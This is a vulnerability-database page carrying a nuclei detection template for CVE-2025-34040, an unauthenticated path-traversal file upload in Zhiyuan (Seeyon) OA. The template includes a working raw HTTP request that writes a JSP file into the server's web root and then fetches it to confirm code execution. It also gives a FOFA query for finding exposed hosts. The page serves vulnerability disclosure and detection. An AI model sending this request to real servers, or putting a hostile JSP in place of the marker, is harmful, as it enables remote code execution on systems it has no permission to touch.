Lucene search
K

Zhiyuan OA Platform - Arbitrary File Upload

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Arbitrary file upload vulnerability in Zhiyuan OA platform allows remote code execution via JSP files

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-34040
24 Jun 202501:46
circl
CNNVD
Seeyon Zhiyuan OA 安全漏洞
24 Jun 202500:00
cnnvd
CVE
CVE-2025-34040
24 Jun 202501:12
cve
Cvelist
CVE-2025-34040 Seeyon Zhiyuan OA System Path Traversal File Upload
24 Jun 202501:12
cvelist
Exploit DB
Zhiyuan OA - arbitrary file upload leading
6 Apr 202600:00
exploitdb
EUVD
EUVD-2025-19043
3 Oct 202520:07
euvd
GithubExploit
Exploit for CVE-2025-34040
29 Aug 202507:33
githubexploit
NVD
CVE-2025-34040
24 Jun 202502:15
nvd
Packet Storm
📄 Zhiyuan OA Traversal / File Upload
6 Apr 202600:00
packetstorm
Positive Technologies
PT-2025-26671
24 Jun 202500:00
ptsecurity
Rows per page
id: CVE-2025-34040

info:
  name: Zhiyuan OA Platform - Arbitrary File Upload
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    An arbitrary file upload vulnerability exists in the Zhiyuan OA platform 5.0, 5.1 - 5.6sp1, 6.0 - 6.1sp2, 7.0, 7.0sp1 - 7.1, 7.1sp1, and 8.0 - 8.0sp2 via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.
  impact: |
    Unauthenticated attackers can upload malicious JSP files through path traversal in the wpsAssistServlet interface, achieving remote code execution on the Zhiyuan OA server.
  remediation: |
    Upgrade to Zhiyuan OA platform version 8.0sp3 or later that properly validates file upload paths and file types.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-34040
    - https://www.cnblogs.com/pursue-security/p/17677130.html
  classification:
    epss-score: 0.1438
    epss-percentile: 0.96186
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="seeyon/index.jsp"
  tags: cve,cve2025,file-upload,intrusive,zhiyuan,lfi,vkev,vuln

variables:
  marker: "{{randstr}}"
  filename: "{{randbase(8)}}"

http:
  - raw:
      - |
        POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&fileId=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
        Accept-Encoding: gzip

        --59229605f98b8cf290a7b8908b34616b
        Content-Disposition: form-data; name="upload"; filename="123.xls"
        Content-Type: application/vnd.ms-excel

        <%@ page import="java.util.Base64" %><%= new String(Base64.getDecoder().decode("{{base64(marker)}}"), "UTF-8") %>
        --59229605f98b8cf290a7b8908b34616b--

    matchers:
      - type: word
        part: body
        words:
          - "officeTransResultFlag"
          - '"success":true'
        condition: and
        internal: true

  - raw:
      - |
        GET /{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{marker}}"
# digest: 4b0a00483046022100c9e84623eaab9c5b7e4f0b52bda90ddf6bccf823181f8d2dea2eacfb91e502e0022100e13ac18c8494fad05d8b826e92c5f25273d28f1057cd3ebfa1cfbd3f6a484e95:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 410
EPSS0.1438
SSVC
28